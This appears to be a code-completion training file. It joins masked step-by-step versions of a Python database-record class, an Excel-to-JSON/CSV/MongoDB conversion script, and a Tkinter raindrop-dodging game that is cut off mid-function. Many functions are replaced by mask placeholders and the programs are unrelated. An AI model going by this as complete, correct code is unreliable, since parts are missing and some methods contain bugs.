{ "blob_id": "76d2c3f74e8fae160396b4015ccec478dba97b87", "index": 7422, "step-1": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n <mask token>\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n <mask token>\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. 
All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n <mask token>\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-3": "<mask token>\n\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\"\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. 
All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0],\n element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-4": "<mask token>\nfrom SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL\n\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection 
tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\"\n\n def __init__(self, id_ds_conf_ds=-1, value_configuration=-1,\n FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0],\n element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n sqlObj = _DS_config_DS_SQL()\n 
value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(\n self.value_configuration, self.FK_id_configuration_DCT_DCD,\n self.FK_id_dataset_DS_DCD)\n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mai 15 11:34:22 2018\n\n@author: Diogo Leite\n\"\"\"\n\nfrom SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL\n\nclass Dataset_conf_ds(object):\n \"\"\"\n This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database\n\n NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration\n\n By default, all FK are in the lasts positions in the parameters declaration\n \"\"\" \n\n def __init__(self, id_ds_conf_ds = -1, value_configuration = -1, FK_id_configuration_DCT_DCD = -1, FK_id_dataset_DS_DCD = -1):\n \"\"\"\n Constructor of the DDI_interactionDB object. All the parameters have a default value\n\n :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown\n :param value_configuration: value of the bins - -1 if unknown\n :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown\n :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS)\n\n :type id_ds_conf_ds: int - not required\n :type value_configuration: int - not required\n :type FK_id_configuration_DCT_DCD: text (date format) - required \n :type FK_id_dataset_DS_DCD: int - required \n \"\"\"\n\n self.id_ds_conf_ds = id_ds_conf_ds\n self.value_configuration = value_configuration\n self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD\n self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD\n\n def get_all_datasets_conf_ds():\n \"\"\"\n return an array with all the configurations of datasets in the database\n\n :return: array of datasets configurations\n :rtype: array(DDI_interaction_DB)\n \"\"\"\n listOfDatasetDSConfig = []\n 
sqlObj = _DS_config_DS_SQL()\n results = sqlObj.select_all_DDI_DB()\n for element in results:\n listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3]))\n return listOfDatasetDSConfig\n\n def create_ds_config_ds(self):\n \"\"\"\n Insert a dataset configuration of Dataset in the database return it id\n The ds_conf_ds contain:\n - value of the creation\n - FK of the configuration\n - FK of the dataset\n\n :return: id Dataset_conf_ds\n :rtype int\n \"\"\"\n\n\n sqlObj = _DS_config_DS_SQL()\n value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD)\n \n self.id_ds_conf_ds = value_id_ds_conf_ds\n return value_id_ds_conf_ds", "step-ids": [ 2, 3, 5, 6, 7 ] }
[ 2, 3, 5, 6, 7 ]
import os import re import click import pandas as pd from pymongo import MongoClient from pathlib import Path, PurePath def extract_dir_name(input_file): """ creates a directory path based on the specified file name :param input_file: file bane :return: full path, minus extension """ fname = PurePath(input_file).__str__() s = fname.split('.') name = '.'.join(s[:-1]) return name def prep_file_name(path, file): """ append the original path and file name * strips special chars * remove spaces (replace with underscore) * convert to lowercase :param path: the path part of the new file name :param file: the original file name :return: sanitized name """ name = path.__str__() + '~' + file.__str__() name = name.lower() name = name.replace(' ', '_') name = re.sub('[^a-z0-9\-_!.~]+', '', name) return name def open_dir(input_path, patterns): """ Opens the specified input path and returns any located excel file :param patterns: the file extensions to glob over (eg xls, csv) :param input_path: the starting path :return: generator of all found files """ for ext in patterns: for file in Path(input_path).glob('**/*.' 
+ ext): yield file def shred_sheets(subdomain, audit_date, input_file, _format): """ Opens an excel workbook, and converts all sheets to a new file of the specified format :param subdomain: appended to data frame :param audit_date: appended to data fram :param input_file: the path to the excel book :param _format: the format to convert all sheets :return: """ name = extract_dir_name(input_file) fname = PurePath(input_file).name.__str__() try: os.makedirs(name) except: pass wb = pd.ExcelFile(input_file) for ws in wb.sheet_names: data = pd.read_excel(input_file, sheet_name=ws) # add constants data.index.names = ['ix'] data['subdomin'] = subdomain data['audit_date'] = audit_date # strip chars we don't want in colum names cols = data.columns renamed = [] for col in cols: col = re.sub('[^a-zA-Z0-9]', '', col) renamed.append(col) data.columns = renamed # build output formats if _format == 'mongo': client = MongoClient('mongodb://localhost:27017/') db = client.Sitebulb cl = db.August5 try: cl.insert_many(data.to_dict('records')) except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue if _format == 'json' or _format == 'all': try: new_file = os.path.join(name, fname + '~' + ws + '.json') data.to_json(new_file, orient="records") except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue if _format == 'csv' or _format == 'all': try: new_file = os.path.join(name, fname + '~' + ws + '.csv') data.to_csv(new_file) except Exception as e: click.secho(f'\nERROR in [{input_file},{ws}] -- {e}', fg='red') continue
normal
{ "blob_id": "f831b77850dfe22232092f66705e36970828a75b", "index": 4975, "step-1": "<mask token>\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' 
+ ext):\n yield file\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' + ext):\n yield file\n\n\ndef shred_sheets(subdomain, audit_date, input_file, _format):\n \"\"\"\n Opens an excel workbook, and converts all sheets to a new file of the specified format\n :param subdomain: appended to data frame\n :param audit_date: appended to data fram\n :param input_file: the path to the excel book\n :param _format: the format to convert all sheets\n :return:\n \"\"\"\n name = extract_dir_name(input_file)\n fname = PurePath(input_file).name.__str__()\n try:\n os.makedirs(name)\n except:\n pass\n wb = pd.ExcelFile(input_file)\n for ws in wb.sheet_names:\n data = pd.read_excel(input_file, sheet_name=ws)\n data.index.names = ['ix']\n data['subdomin'] = subdomain\n data['audit_date'] = audit_date\n cols = data.columns\n renamed = []\n for col in cols:\n col = re.sub('[^a-zA-Z0-9]', '', col)\n renamed.append(col)\n data.columns = renamed\n if _format == 'mongo':\n client = MongoClient('mongodb://localhost:27017/')\n db = client.Sitebulb\n cl = db.August5\n try:\n cl.insert_many(data.to_dict('records'))\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', 
fg='red')\n continue\n if _format == 'json' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.json')\n data.to_json(new_file, orient='records')\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'csv' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\n data.to_csv(new_file)\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n", "step-4": "import os\nimport re\nimport click\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom pathlib import Path, PurePath\n\n\ndef extract_dir_name(input_file):\n \"\"\"\n creates a directory path based on the specified file name\n :param input_file: file bane\n :return: full path, minus extension\n \"\"\"\n fname = PurePath(input_file).__str__()\n s = fname.split('.')\n name = '.'.join(s[:-1])\n return name\n\n\ndef prep_file_name(path, file):\n \"\"\"\n append the original path and file name\n * strips special chars\n * remove spaces (replace with underscore)\n * convert to lowercase\n :param path: the path part of the new file name\n :param file: the original file name\n :return: sanitized name\n \"\"\"\n name = path.__str__() + '~' + file.__str__()\n name = name.lower()\n name = name.replace(' ', '_')\n name = re.sub('[^a-z0-9\\\\-_!.~]+', '', name)\n return name\n\n\ndef open_dir(input_path, patterns):\n \"\"\"\n Opens the specified input path and returns any located excel file\n :param patterns: the file extensions to glob over (eg xls, csv)\n :param input_path: the starting path\n :return: generator of all found files\n \"\"\"\n for ext in patterns:\n for file in Path(input_path).glob('**/*.' 
+ ext):\n yield file\n\n\ndef shred_sheets(subdomain, audit_date, input_file, _format):\n \"\"\"\n Opens an excel workbook, and converts all sheets to a new file of the specified format\n :param subdomain: appended to data frame\n :param audit_date: appended to data fram\n :param input_file: the path to the excel book\n :param _format: the format to convert all sheets\n :return:\n \"\"\"\n name = extract_dir_name(input_file)\n fname = PurePath(input_file).name.__str__()\n try:\n os.makedirs(name)\n except:\n pass\n wb = pd.ExcelFile(input_file)\n for ws in wb.sheet_names:\n data = pd.read_excel(input_file, sheet_name=ws)\n data.index.names = ['ix']\n data['subdomin'] = subdomain\n data['audit_date'] = audit_date\n cols = data.columns\n renamed = []\n for col in cols:\n col = re.sub('[^a-zA-Z0-9]', '', col)\n renamed.append(col)\n data.columns = renamed\n if _format == 'mongo':\n client = MongoClient('mongodb://localhost:27017/')\n db = client.Sitebulb\n cl = db.August5\n try:\n cl.insert_many(data.to_dict('records'))\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'json' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.json')\n data.to_json(new_file, orient='records')\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n if _format == 'csv' or _format == 'all':\n try:\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\n data.to_csv(new_file)\n except Exception as e:\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\n continue\n", "step-5": "import os\r\nimport re\r\nimport click\r\nimport pandas as pd\r\nfrom pymongo import MongoClient\r\nfrom pathlib import Path, PurePath\r\n\r\n\r\ndef extract_dir_name(input_file):\r\n \"\"\"\r\n creates a directory path based on the specified file name\r\n :param input_file: file bane\r\n :return: full path, minus extension\r\n \"\"\"\r\n fname = 
PurePath(input_file).__str__()\r\n s = fname.split('.')\r\n name = '.'.join(s[:-1])\r\n return name\r\n\r\n\r\ndef prep_file_name(path, file):\r\n \"\"\"\r\n append the original path and file name\r\n * strips special chars\r\n * remove spaces (replace with underscore)\r\n * convert to lowercase\r\n :param path: the path part of the new file name\r\n :param file: the original file name\r\n :return: sanitized name\r\n \"\"\"\r\n name = path.__str__() + '~' + file.__str__()\r\n name = name.lower()\r\n name = name.replace(' ', '_')\r\n name = re.sub('[^a-z0-9\\-_!.~]+', '', name)\r\n return name\r\n\r\n\r\ndef open_dir(input_path, patterns):\r\n \"\"\"\r\n Opens the specified input path and returns any located excel file\r\n :param patterns: the file extensions to glob over (eg xls, csv)\r\n :param input_path: the starting path\r\n :return: generator of all found files\r\n \"\"\"\r\n for ext in patterns:\r\n for file in Path(input_path).glob('**/*.' + ext):\r\n yield file\r\n\r\n\r\ndef shred_sheets(subdomain, audit_date, input_file, _format):\r\n \"\"\"\r\n Opens an excel workbook, and converts all sheets to a new file of the specified format\r\n :param subdomain: appended to data frame\r\n :param audit_date: appended to data fram\r\n :param input_file: the path to the excel book\r\n :param _format: the format to convert all sheets\r\n :return:\r\n \"\"\"\r\n name = extract_dir_name(input_file)\r\n fname = PurePath(input_file).name.__str__()\r\n try:\r\n os.makedirs(name)\r\n except:\r\n pass\r\n\r\n wb = pd.ExcelFile(input_file)\r\n for ws in wb.sheet_names:\r\n data = pd.read_excel(input_file, sheet_name=ws)\r\n # add constants\r\n data.index.names = ['ix']\r\n data['subdomin'] = subdomain\r\n data['audit_date'] = audit_date\r\n\r\n # strip chars we don't want in colum names\r\n cols = data.columns\r\n renamed = []\r\n for col in cols:\r\n col = re.sub('[^a-zA-Z0-9]', '', col)\r\n renamed.append(col)\r\n\r\n data.columns = renamed\r\n\r\n # build output formats\r\n 
if _format == 'mongo':\r\n client = MongoClient('mongodb://localhost:27017/')\r\n db = client.Sitebulb\r\n cl = db.August5\r\n\r\n try:\r\n cl.insert_many(data.to_dict('records'))\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n\r\n if _format == 'json' or _format == 'all':\r\n try:\r\n new_file = os.path.join(name, fname + '~' + ws + '.json')\r\n data.to_json(new_file, orient=\"records\")\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n\r\n if _format == 'csv' or _format == 'all':\r\n try:\r\n new_file = os.path.join(name, fname + '~' + ws + '.csv')\r\n data.to_csv(new_file)\r\n except Exception as e:\r\n click.secho(f'\\nERROR in [{input_file},{ws}] -- {e}', fg='red')\r\n continue\r\n", "step-ids": [ 1, 2, 3, 5, 6 ] }
[ 1, 2, 3, 5, 6 ]
<|reserved_special_token_0|>


def init2(data):
    """Load button images and reset per-game state (part 2 of the init chain)."""
    data.tbg = PhotoImage(file='tbg2.gif')
    data.click = PhotoImage(file='click.gif')        # "selected" button image
    data.notClick = PhotoImage(file='notClick.gif')  # "unselected" button image
    # Two-player starting positions (each player at the bottom of their half).
    data.player1X = 150
    data.player1Y = 750
    data.player2X = 550
    data.player2Y = 750
    data.winner = None
    data.speed = 12    # upward climb speed in pixels per timer tick
    data.speed2 = 12
    data.editorTime = 0
    data.editorDrops = []  # decorative rain on editor/difficulty screens
    data.margin = 100
    data.enter = False  # NOTE(review): reassigned to an image in init3 — confirm intent
    # Level-editor selections; None until the user picks each option.
    data.powerUpsEditor = None
    data.yourSpeed = None
    data.rainSpeed = None
    # All option buttons start out in the "unselected" state.
    data.slow = data.notClick
    data.medium = data.notClick
    data.fast = data.notClick
    data.drizzle = data.notClick
    data.rain = data.notClick
    data.thunderstorm = data.notClick
    init3(data)


def init3(data):
    """Continue init: button states, screen images, and saved-score loading."""
    data.yes = data.notClick
    data.no = data.notClick
    data.enter = data.notClick
    data.levelEditorLives = 2
    data.rSpeed = None       # rain interval chosen in the level editor
    data.start = None        # y-position recorded when a power-up is collected
    data.start1 = None
    data.start2 = None
    data.difficulty = None   # AI dodge threshold (set to difS/difM/difH)
    data.mode1 = data.notClick
    data.mode2 = data.notClick
    data.mode3 = data.notClick
    data.mode4 = data.notClick
    data.mode5 = data.notClick
    data.mode6 = data.notClick
    data.home = PhotoImage(file='home.gif')
    data.helpScreen = PhotoImage(file='help1.gif')
    data.title = PhotoImage(file='title.gif')
    data.scoreList = []
    data.spotList = [270, 364, 458, 552, 646, 740]  # lane x-positions for drops
    data.savedScores = readFile('score.txt')        # persisted score file
    if data.mode == 'levelCreated':
        setEverything(data)
    initsplashScreenNumbers(data)


def initsplashScreenNumbers(data):
    """Set splash-screen layout constants and shared gameplay numbers."""
    data.splashButtonY = 425
    # x-positions of the six menu buttons.
    data.p1ButtonX = 225
    data.p2ButtonX = 290
    data.edButton = 355
    data.diffButton = 425
    data.helpButton = 490
    data.sboardButton = 555
    data.hitPenalty = 75   # pixels a player is knocked back down when hit
    data.splashText = data.height / 2 - 20
    data.lives = 2
    data.levelMax = 8
    data.lane = 94         # horizontal distance between adjacent lanes
    data.Player1Min = 270  # leftmost lane x-position
    data.Player1Max = 740  # rightmost lane x-position
    data.homeX = 50        # home-button position
    data.homeY = 650
    initScoreBoardHelp(data)
    init1Player(data)


<|reserved_special_token_0|>


def init1Player(data):
    """Single-player-only constant."""
    data.buffer = 40


def initAI(data):
    """Layout and difficulty constants for the vs-computer (AI) screens."""
    data.AITY = 225
    # Difficulty-button positions.
    data.easyX = 200
    data.easyY = 300
    data.medX = 400
    data.hardX = 600
    data.enterY = 450
    # Difficulty thresholds: chance (out of a 0-9 roll) the AI dodges in hitAI1.
    data.difS = 4
    data.difM = 6
    data.difH = 8
    data.last = 500
    data.enterX = 575  # NOTE(review): used as a y-coordinate in changeEnter — confirm naming
    # Editor question-row positions (PowerUps / Rain speed / Your speed).
    data.PUT = 450
    data.RST = 350
    data.YST = 250


<|reserved_special_token_0|>


def redrawAll(canvas, data):
    """Top-level draw dispatcher: delegate to the active screen's redrawAll."""
    if data.mode == 'splashScreen':
        splashScreenRedrawAll(canvas, data)
    elif data.mode == '1Player':
        playerRedrawAll(canvas, data)
    elif data.mode == '2Player':
        twoPlayerRedrawAll(canvas, data)
    elif data.mode == 'editor':
        editorRedrawAll(canvas, data)
    elif data.mode == 'levelCreated':
        levelCreatedRedrawAll(canvas, data)
    elif data.mode == 'AI':
        AIRedrawAll(canvas, data)
    elif data.mode == 'difficulty':
        difficultyRedrawAll(canvas, data)
    elif data.mode == 'scoreboard':
        scoreboardRedrawAll(canvas, data)
    elif data.mode == 'help':
        helpRedrawAll(canvas, data)


<|reserved_special_token_0|>


def splashKeyPressed(event, data):
    """No keyboard handling on the splash screen."""
    pass


def splashScreenTimerFired(data):
    """Advance splash animation: spawn a drop every other tick, move all drops."""
    data.splashScreenTime += 1
    if data.splashScreenTime % 2 == 1:
        rainDropSplash(data)
    for drop in data.splashScreenDrops:
        drop.onTimerFired(data)


<|reserved_special_token_0|>


def rainDropSplash(data):
    """Spawn one decorative raindrop at a random x along the top of the screen."""
    xPosition = random.randint(0, 800)
    data.splashScreenDrops.append(Coconuts(xPosition, 0))


def splashScreenRedrawAll(canvas, data):
    """Draw the title, animated rain, the menu text, and the menu buttons."""
    canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)
    for drop in data.splashScreenDrops:
        drop.draw(canvas)
    canvas.create_text(data.width / 2, data.splashText, text=
        """
 1.) Single Player Level Mode
 2.) Two-Player Mode
 3.) Level Creator Practice Mode
 4.) Play Against the Computer
 5.) Help and Instructions
 6.) Scoreboard
""", font='Arial 14 bold', fill='yellow')
    splashScreenButtons(canvas, data)


def writeFile(path, contents):
    """Overwrite the file at path with contents (used for score persistence)."""
    with open(path, 'wt') as f:
        f.write(contents)


def readFile(path):
    """Return the full text contents of the file at path."""
    with open(path, 'rt') as f:
        return f.read()


class Coconuts(object):
    """A falling raindrop hazard (diamond-shaped) that descends each tick."""

    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.r = 9                   # collision radius
        self.fill = 'deep sky blue'
        self.speed = 30              # fall speed in pixels per tick
        self.outline = 'blue'

    def draw(self, canvas):
        # Diamond: top, left, bottom, right vertices around (x, y).
        canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,
            self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=
            self.fill, outline=self.outline, width=3)

    def onTimerFired(self, data):
        self.y += self.speed


def hit(data):
    """Single-player / editor collision: knock the player down and adjust score/lives."""
    for coconut in data.coconuts:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:
                if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +
                        data.r):
                    data.cy += data.hitPenalty
                    if data.mode == 'levelCreated':
                        data.lives -= 1
                    elif data.hit == False and data.level < data.levelMax:
                        data.score -= data.level
                    data.coconuts.remove(coconut)
                    # NOTE(review): levelCreated mode decrements both lives and
                    # levelEditorLives on one hit — confirm that is intended.
                    if data.mode == 'levelCreated':
                        data.levelEditorLives -= 1


def hit2Player(data):
    """Two-player collision: knock each non-invincible player down when hit."""
    if data.mode == '2Player':
        if data.Invincible1 == False:
            for coconut in data.coconuts1:
                if (coconut.y >= data.player1Y - data.r and coconut.y <=
                        data.player1Y + data.r):
                    if (coconut.x >= data.player1X - data.r and coconut.x <=
                            data.player1X + data.r):
                        data.player1Y += data.hitPenalty
                        data.coconuts1.remove(coconut)
        if data.Invincible2 == False:
            for coconut in data.coconuts2:
                if (coconut.y >= data.player2Y - data.r and coconut.y <=
                        data.player2Y + data.r):
                    if (coconut.x >= data.player2X - data.r and coconut.x <=
                            data.player2X + data.r):
                        data.player2Y += data.hitPenalty
                        data.coconuts2.remove(coconut)


class PowerUps(Coconuts):
    """Falling hourglass power-up: pauses the rain for the collector."""

    def __init__(self, x, y):
        super().__init__(x, y)

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.hourGlass)


def hitPause(data):
    """Collect an hourglass: set the pause flag and record the pickup height."""
    for powerUp in data.powerUps:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:
                if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +
                        data.r):
                    data.pauseDrops = True
                    data.start = data.cy
                    data.powerUps.remove(powerUp)
        elif data.mode == '2Player' or data.mode == 'AI':
            if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.
                    player1Y + data.r):
                if (powerUp.x >= data.player1X - data.r and powerUp.x <=
                        data.player1X + data.r):
                    data.pause1Drop = True
                    data.start1 = data.player1Y
                    data.powerUps.remove(powerUp)
            if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.
                    player2Y + data.r):
                if (powerUp.x >= data.player2X - data.r and powerUp.x <=
                        data.player2X + data.r):
                    data.pause2Drop = True
                    data.start2 = data.player2Y
                    data.powerUps.remove(powerUp)


class Invincible(PowerUps):
    """Falling umbrella power-up: makes the collector temporarily invincible."""

    def __init__(self, x, y):
        super().__init__(x, y)

    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.umbrella)


def hitInvincible(data):
    """Collect an umbrella: set the invincibility flag and record pickup height."""
    for powerUp in data.invincible:
        if data.mode == '1Player' or data.mode == 'levelCreated':
            if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:
                if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +
                        data.r):
                    data.beInvincible = True
                    data.start = data.cy
                    data.invincible.remove(powerUp)
        if data.mode == '2Player' or data.mode == 'AI':
            if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.
                    player1Y + data.r):
                if (powerUp.x >= data.player1X - data.r and powerUp.x <=
